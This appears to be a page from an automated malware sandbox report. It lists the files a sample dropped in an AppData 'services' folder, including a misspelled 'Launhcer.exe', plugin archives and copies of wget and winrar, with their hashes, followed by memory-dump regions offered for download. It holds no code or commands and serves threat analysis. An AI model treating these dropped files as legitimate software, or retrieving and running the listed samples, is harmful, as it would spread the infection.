d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\WinRAR\version.dat

Filesize
12B

MD5
ec72e4dc8ff108a19d84db979fdd4bb8

SHA1
f67daded86887913fb68bb315a18ed3c5d835c0b

SHA256
ea2f99fd8c1e7f877971fcaf9ebe02356f6fa90d2cd7d8dc67151df15d7191dd

SHA512
788e584500623bc60595de9b7c72452d5f36b1c1589c58c728a724032eb6c6249fd03d0edd46652d5cff760b58a41f18b1a2849ca32c0a1290918f7fd8bd08b1

Download Submit
C:\Users\Admin\AppData\Roaming\services\01plugins16661.rar

Filesize
3.0MB

MD5
d1aae30574ec572c078dab832fe93816

SHA1
a90e3beda6812e716195461e28fd528ffa31a5f9

SHA256
aab29101387e562012b7ddda280543a38c7b52502b8f874b92a030bf2ddb97cd

SHA512
54fd6e06903d0591ecbdd380b046a4ef0e7c0e03a92343fefa770bec0190b31785174e5765247c45123008144c4c6ba58ecb336170da7469b4ed813cc4556282

Download Submit
C:\Users\Admin\AppData\Roaming\services\02plugins549.rar

Filesize
9.6MB

MD5
5cfa362d6d89d663bdb58ccd5333a54a

SHA1
a4753db03c5ddcc3f07eb4ce3b9f909fb9807fcd

SHA256
6f3299d60da1cee65c07ff09c0ed630eeccbf60d2b7c5a523a82b8b1f9d7242f

SHA512
55bf3494ffcdcbe1de0e798c2d5bfa8ade3fd1e68d77481eec9a0a2731569ade26d69b18cbe26a941c2459644ca21bd9e53a521ecad7b0065a45ce056c4a88db

Download Submit
C:\Users\Admin\AppData\Roaming\services\03plugins14788.rar

Filesize
2.9MB

MD5
918e0dc1f169a7f54ef1a0e7c0833663

SHA1
edbaac4570220e72efc8206a853879219852820c

SHA256
bdc8a6427d61bb0a249ad216c8a760483d095cf7216761a4c3ed0e62073ca214

SHA512
e7ca5e9b38ece403436e90b99722eb56158c15ce077993e8f70db3755210d3569df15b059730729b253c3a54de1551efe9ac6b5061a8abf400514827188ec919

Download Submit
C:\Users\Admin\AppData\Roaming\services\2plugin28438

Filesize
7.2MB

MD5
3d42a95de858de974d5dad1cbc7e87ed

SHA1
230e157d35007fbf594243e93fa2bf84982c5c46

SHA256
47a98e0d3ba207cf0afeef5d9d04c893dbe5bfb6e0c5537fa583bdb67c915010

SHA512
500072e9c94a92e23b9f24785c8218d35224422a4d2fbeb2ac273a3ef6957a93b73b8716297bdbbab8334ba5fb1700415c50d39b6be45ae9dd467dbebe9b4974

Download Submit
C:\Users\Admin\AppData\Roaming\services\3plugin18226

Filesize
388KB

MD5
c44f5d83d3bfa3594baa05191ef657bd

SHA1
2feab132830353ed66edd60b9e5691613baa15b0

SHA256
49e78a2e6a59cac4f4c186c9cb4e27bbb1ddcacb1d5d031b29f19dcb5ef32e32

SHA512
e82d0ac5d3fd7e4e087036b86b715f79954682f2c1014dd53ac9e521f3d317724ca18390917704dceb4ad1a3d51b8189e045ed8008a9c181b3cb3b11119c45eb

Download Submit
C:\Users\Admin\AppData\Roaming\services\Launhcer.dll

Filesize
2KB

MD5
7de0541eb96ba31067b4c58d9399693b

SHA1
a105216391bd53fa0c8f6aa23953030d0c0f9244

SHA256
934f75c8443d6379abdc380477a87ef6531d0429de8d8f31cd6b62f55a978f6e

SHA512
e5ffa3bfd19b4d69c8b4db0aabaf835810b8b8cccd7bc400c7ba90ef5f5ebd745c2619c9a3e83aa6b628d9cf765510c471a2ff8cb6aa5ad4cf3f7826f6ae84a3

Download Submit
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe

Filesize
364KB

MD5
e5c00b0bc45281666afd14eef04252b2

SHA1
3b6eecf8250e88169976a5f866d15c60ee66b758

SHA256
542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903

SHA512
2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387

Download Submit
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest

Filesize
1KB

MD5
f0fc065f7fd974b42093594a58a4baef

SHA1
dbf28dd15d4aa338014c9e508a880e893c548d00

SHA256
d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693

SHA512
8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll

Filesize
6KB

MD5
f58866e5a48d89c883f3932c279004db

SHA1
e72182e9ee4738577b01359f5acbfbbe8daa2b7f

SHA256
d6f3e13dfff0a116190504efbfcbcd68f5d2183e6f89fd4c860360fba0ec8c12

SHA512
7e76555e62281d355c2346177f60bfe2dc433145037a34cfc2f5848509401768b4db3a9fd2f6e1a1d69c5341db6a0b956abf4d975f28ee4262f1443b192fe177

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe

Filesize
364KB

MD5
93fde4e38a84c83af842f73b176ab8dc

SHA1
e8c55cc160a0a94e404f544b22e38511b9d71da8

SHA256
fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03

SHA512
48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest

Filesize
1KB

MD5
1b6de83d3f1ccabf195a98a2972c366a

SHA1
09f03658306c4078b75fa648d763df9cddd62f23

SHA256
e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724

SHA512
e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce

Download Submit
C:\Users\Admin\AppData\Roaming\services\plugin1515

Filesize
545KB

MD5
1d052128c3acead9fedabad4d152e490

SHA1
5acf69e1e3b5acfe99e70a1d953682ca25386082

SHA256
2161b890961a7fa3f0b43618179c0d5067a3ea35a4d01a3713de9bb11cd76b63

SHA512
455b775978405da29a3bd0833edab3ee683106d6cb8bd7aa2216c9453021f4b9a028fcc6583725bfca4534c336085b39e19cd95f20f4b8f6cd84e636bbcc5779

Download Submit
C:\Users\Admin\AppData\Roaming\services\wget.exe

Filesize
4.9MB

MD5
8c04808e4ba12cb793cf661fbbf6c2a0

SHA1
bdfdb50c5f251628c332042f85e8dd8cf5f650e3

SHA256
a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272

SHA512
9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f

Download Submit
C:\Users\Admin\AppData\Roaming\services\winrar.exe

Filesize
2.1MB

MD5
f59f4f7bea12dd7c8d44f0a717c21c8e

SHA1
17629ccb3bd555b72a4432876145707613100b3e

SHA256
f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4

SHA512
44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

Download Submit
memory/672-524-0x0000000140000000-0x0000000140E40000-memory.dmp

Filesize
14.2MB

Download
memory/1248-27-0x0000000005860000-0x00000000058C6000-memory.dmp

Filesize
408KB

Download
memory/1248-25-0x0000000005750000-0x0000000005772000-memory.dmp

Filesize
136KB

Download
memory/1248-20-0x000000007392E000-0x000000007392F000-memory.dmp

Filesize
4KB

Download
memory/1248-21-0x0000000004920000-0x0000000004956000-memory.dmp

Filesize
216KB

Download
memory/1248-23-0x0000000073920000-0x00000000740D0000-memory.dmp

Filesize
7.7MB

Download
memory/1248-22-0x0000000004FB0000-0x00000000055D8000-memory.dmp

Filesize
6.2MB

Download
memory/1248-24-0x0000000073920000-0x00000000740D0000-memory.dmp

Filesize
7.7MB

Download
memory/1248-26-0x00000000057F0000-0x0000000005856000-memory.dmp

Filesize
408KB

Download
memory/1248-116-0x0000000073920000-0x00000000740D0000-memory.dmp

Filesize
7.7MB

Download
memory/1248-150-0x0000000073920000-0x00000000740D0000-memory.dmp

Filesize
7.7MB

Download
memory/1248-115-0x000000007392E000-0x000000007392F000-memory.dmp

Filesize
4KB

Download
memory/1248-37-0x00000000059D0000-0x0000000005D24000-memory.dmp

Filesize
3.3MB

Download
memory/1248-43-0x0000000007740000-0x0000000007CE4000-memory.dmp

Filesize
5.6MB

Download
memory/1248-42-0x0000000006430000-0x0000000006452000-memory.dmp

Filesize
136KB

Download
memory/1248-41-0x00000000063E0000-0x00000000063FA000-memory.dmp

Filesize
104KB

Download
memory/1248-40-0x0000000006EE0000-0x0000000006F76000-memory.dmp

Filesize
600KB

Download
memory/1248-39-0x0000000005F00000-0x0000000005F4C000-memory.dmp

Filesize
304KB

Download
memory/1248-38-0x0000000005EE0000-0x0000000005EFE000-memory.dmp

Filesize
120KB

Download
memory/1648-138-0x00007FFC2BBB0000-0x00007FFC2BDA5000-memory.dmp

Filesize
2.0MB

Download
memory/1648-136-0x0000000005210000-0x0000000005610000-memory.dmp

Filesize
4.0MB

Download
memory/1648-149-0x0000000000400000-0x00000000023A4000-memory.dmp

Filesize
31.6MB

Download
memory/1648-140-0x0000000077240000-0x0000000077455000-memory.dmp

Filesize
2.1MB

Download
memory/1648-137-0x0000000005210000-0x0000000005610000-memory.dmp

Filesize
4.0MB

Download
memory/1664-144-0x00007FFC2BBB0000-0x00007FFC2BDA5000-memory.dmp

Filesize
2.0MB

Download
memory/1664-146-0x0000000077240000-0x0000000077455000-memory.dmp

Filesize
2.1MB

Download
memory/1664-143-0x0000000002E80000-0x0000000003280000-memory.dmp

Filesize
4.0MB

Download
memory/1664-141-0x0000000001280000-0x0000000001289000-memory.dmp

Filesize
36KB

Download
memory/1704-84-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/2204-433-0x0000000000400000-0x0000000002C1A000-memory.dmp

Filesize
40.1MB

Download
memory/2656-213-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/3028-811-0x00000000757B0000-0x0000000075A34000-memory.dmp

Filesize
2.5MB

Download
memory/3464-982-0x0000000000400000-0x0000000002C1A000-memory.dmp

Filesize
40.1MB

Download
memory/3476-545-0x000001C09F660000-0x000001C09F715000-memory.dmp

Filesize
724KB

Download
memory/3476-549-0x000001C09F870000-0x000001C09F876000-memory.dmp

Filesize
24KB

Download
memory/3476-548-0x000001C09F8A0000-0x000001C09F8BA000-memory.dmp

Filesize
104KB

Download
memory/3476-546-0x000001C09F3E0000-0x000001C09F3EA000-memory.dmp

Filesize
40KB

Download
memory/3476-544-0x000001C09F640000-0x000001C09F65C000-memory.dmp

Filesize
112KB

Download
memory/3648-474-0x000001FD63490000-0x000001FD634B2000-memory.dmp

Filesize
136KB

Download
memory/3648-501-0x000001FD63840000-0x000001FD63848000-memory.dmp

Filesize
32KB

Download
memory/3648-502-0x000001FD63850000-0x000001FD6385A000-memory.dmp

Filesize
40KB

Download
memory/3648-500-0x000001FD63810000-0x000001FD6381A000-memory.dmp

Filesize
40KB

Download
memory/3648-499-0x000001FD63820000-0x000001FD6383C000-memory.dmp

Filesize
112KB

Download
memory/4220-75-0x0000000007EF0000-0x0000000007F0A000-memory.dmp

Filesize
104KB

Download
memory/4220-70-0x00000000082B0000-0x000000000892A000-memory.dmp

Filesize
6.5MB

Download
memory/4220-71-0x0000000007CE0000-0x0000000007CEA000-memory.dmp

Filesize
40KB

Download
memory/4220-58-0x0000000070260000-0x00000000702AC000-memory.dmp

Filesize
304KB

Download
memory/4220-72-0x0000000007E60000-0x0000000007E71000-memory.dmp

Filesize
68KB

Download
memory/4220-73-0x0000000007EA0000-0x0000000007EAE000-memory.dmp

Filesize
56KB

Download
memory/4220-74-0x0000000007EB0000-0x0000000007EC4000-memory.dmp

Filesize
80KB

Download
memory/4220-57-0x0000000006F30000-0x0000000006F62000-memory.dmp

Filesize
200KB

Download
memory/4220-69-0x0000000007B20000-0x0000000007BC3000-memory.dmp

Filesize
652KB

Download
memory/4220-76-0x0000000007EE0000-0x0000000007EE8000-memory.dmp

Filesize
32KB

Download
memory/4220-68-0x0000000006EF0000-0x0000000006F0E000-memory.dmp

Filesize
120KB

Download
memory/5376-330-0x0000000140000000-0x0000000140E40000-memory.dmp

Filesize
14.2MB

Download
memory/5376-318-0x00007FFC2BDB0000-0x00007FFC2BDB2000-memory.dmp

Filesize
8KB

Download
memory/5376-319-0x00007FFC2BDC0000-0x00007FFC2BDC2000-memory.dmp

Filesize
8KB

Download
memory/5408-385-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/5704-767-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/5704-768-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/5704-766-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/5704-765-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/5704-764-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/5704-779-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/5856-783-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/5856-774-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/5856-775-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/5856-776-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/5856-778-0x0000027DE9AA0000-0x0000027DE9AC0000-memory.dmp

Filesize
128KB

Download
memory/5856-777-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/5856-772-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/5856-773-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/5856-780-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/5856-781-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/5856-784-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/5856-782-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/5856-771-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/5968-518-0x0000000000400000-0x0000000002C1A000-memory.dmp

Filesize
40.1MB

Download
memory/6088-506-0x00000000030E0000-0x00000000031F1000-memory.dmp

Filesize
1.1MB

Download
memory/6088-547-0x0000000010000000-0x00000000102C2000-memory.dmp

Filesize
2.8MB

Download
memory/6088-512-0x0000000003210000-0x0000000003307000-memory.dmp

Filesize
988KB

Download
memory/6088-467-0x0000000010000000-0x00000000102C2000-memory.dmp

Filesize
2.8MB

Download
memory/6088-509-0x0000000003210000-0x0000000003307000-memory.dmp

Filesize
988KB

Download